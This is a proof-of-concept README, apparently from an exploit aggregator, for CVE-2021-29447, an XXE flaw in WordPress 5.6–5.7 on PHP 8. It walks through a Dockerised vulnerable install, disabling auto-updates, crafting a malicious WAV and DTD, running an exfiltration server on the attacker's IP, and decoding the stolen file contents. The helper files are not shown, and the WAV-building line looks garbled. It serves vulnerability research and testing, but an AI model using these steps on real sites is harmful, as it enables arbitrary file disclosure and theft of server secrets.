Share
## https://sploitus.com/exploit?id=4ACE95AB-539A-54D9-83F8-E3D86F5279B3
# CVE-2021-29447-PoC
## Overview
CVE-2021-29447 is an XML External Entity (XXE) injection vulnerability affecting WordPress versions 5.6โ5.7 (patched in 5.7.1) when running PHP 8.0+. The vulnerability resides in the getID3 library used for media metadata parsing.
WordPress processes WAV file iXML chunks via getID3, which invokes simplexml_load_string() with the LIBXML_NOENT flag. This flag explicitly enables external entity substitution, bypassing PHP 8's default XXE protections (deprecated libxml_disable_entity_loader()).
1. Authenticated user (Author+) uploads malicious WAV
2. getID3 โ iXML chunk โ simplexml_load_string(XXE_PAYLOAD, LIBXML_NOENT)
3. External DTD fetch โ PHP data:// wrapper โ Arbitrary file disclosure
## Proof-of-Concept Setup
This PoC demonstrates the vulnerability using Dockerized WordPress 5.7 + PHP 8.0.3. Linux users can use a single-file script that also generates the WAV/DTD files.
โถ๏ธ: https://youtu.be/YnGowuWHFyY
### Prerequisites & Environment Setup
1. Install Docker Desktop on Windows host
2. Create dedicated project directory (all PowerShell commands execute here):
#powershell
mkdir cve-2021-29447-poc
cd cve-2021-29447-poc
3. Deploy vulnerable WordPress:
#powershell
notepad docker-compose.yml
*Copy and paste the content of docker-compose.yml*
4. Start containers:
#powershell
docker-compose up -d
5. Disable auto-updates (critical for vulnerability persistence):
#powershell
docker-compose exec wordpress bash
#bash
sed -i "s/WP_AUTO_UPDATE_CORE', true/WP_AUTO_UPDATE_CORE', false/g" /var/www/html/wp-config-sample.php
echo "define('AUTOMATIC_UPDATER_DISABLED', true);" >> /var/www/html/wp-config-sample.php
echo "define('WP_AUTO_UPDATE_CORE', false);" >> /var/www/html/wp-config-sample.php
tail -5 /var/www/html/wp-config-sample.php
exit
6. Verify vulnerable versions:
#powershell
docker-compose exec wordpress bash -c "grep wp_version /var/www/html/wp-includes/version.php && php -v"
*Expected: WordPress 5.7, PHP 8.0+*
7. WordPress Installation:
Navigate: *http://localhost:8080*
Admin: *test* / *test* / *test@test.com*
Complete setup โ Access /wp-admin
9. Attacker IP Discovery:
#powershell
ipconfig | findstr IPv4
*Note your IP (e.g. 192.168.1.196)*
### Exploit Payload Generation
1. Create DTD payload:
#powershell
notepad evil.dtd
*Copy and paste the content of evil.dtd*
2. Generate WAV payload (Linux CLI):
#bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00' > payload.wav
*Transfer via python3 -m http.server 8000 โ Windows browser download (e.g. http://:8000)*
*Note: WAV created separately due to binary escaping complexity in Windows environments*
3. Deploy exploit server:
#powershell
notepad exploit.py
*Copy and paste the content of exploit.py*
Command:
#powershell
python exploit.py -l YOUR_IP -p PORT
### Exploitation
1. Trigger XXE:
http://localhost:8080/wp-admin โ Media โ Add New
Upload *payload.wav*
2. Monitor Python server console -> capture exfiltrated data
3. Decode Base64+Zlib payload:
#powershell
$bd='PASTE_BASE64_HERE';$bytes=[Convert]::FromBase64String($bd);$decoded=[System.IO.Compression.DeflateStream]::new([System.IO.MemoryStream]::new($bytes,$false),[System.IO.Compression.CompressionMode]::Decompress);[System.IO.StreamReader]::new($decoded).ReadToEnd()
## Mitigation
Upgrade to WordPress 5.7.1+ or disable LIBXML_NOENT in getID3 parsing.